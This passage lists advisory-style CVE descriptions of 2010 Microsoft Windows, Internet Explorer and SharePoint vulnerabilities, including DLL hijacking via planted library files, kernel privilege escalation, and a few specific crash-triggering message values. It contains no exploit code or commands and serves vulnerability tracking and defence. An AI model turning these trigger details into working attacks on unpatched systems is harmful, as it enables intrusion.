Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and 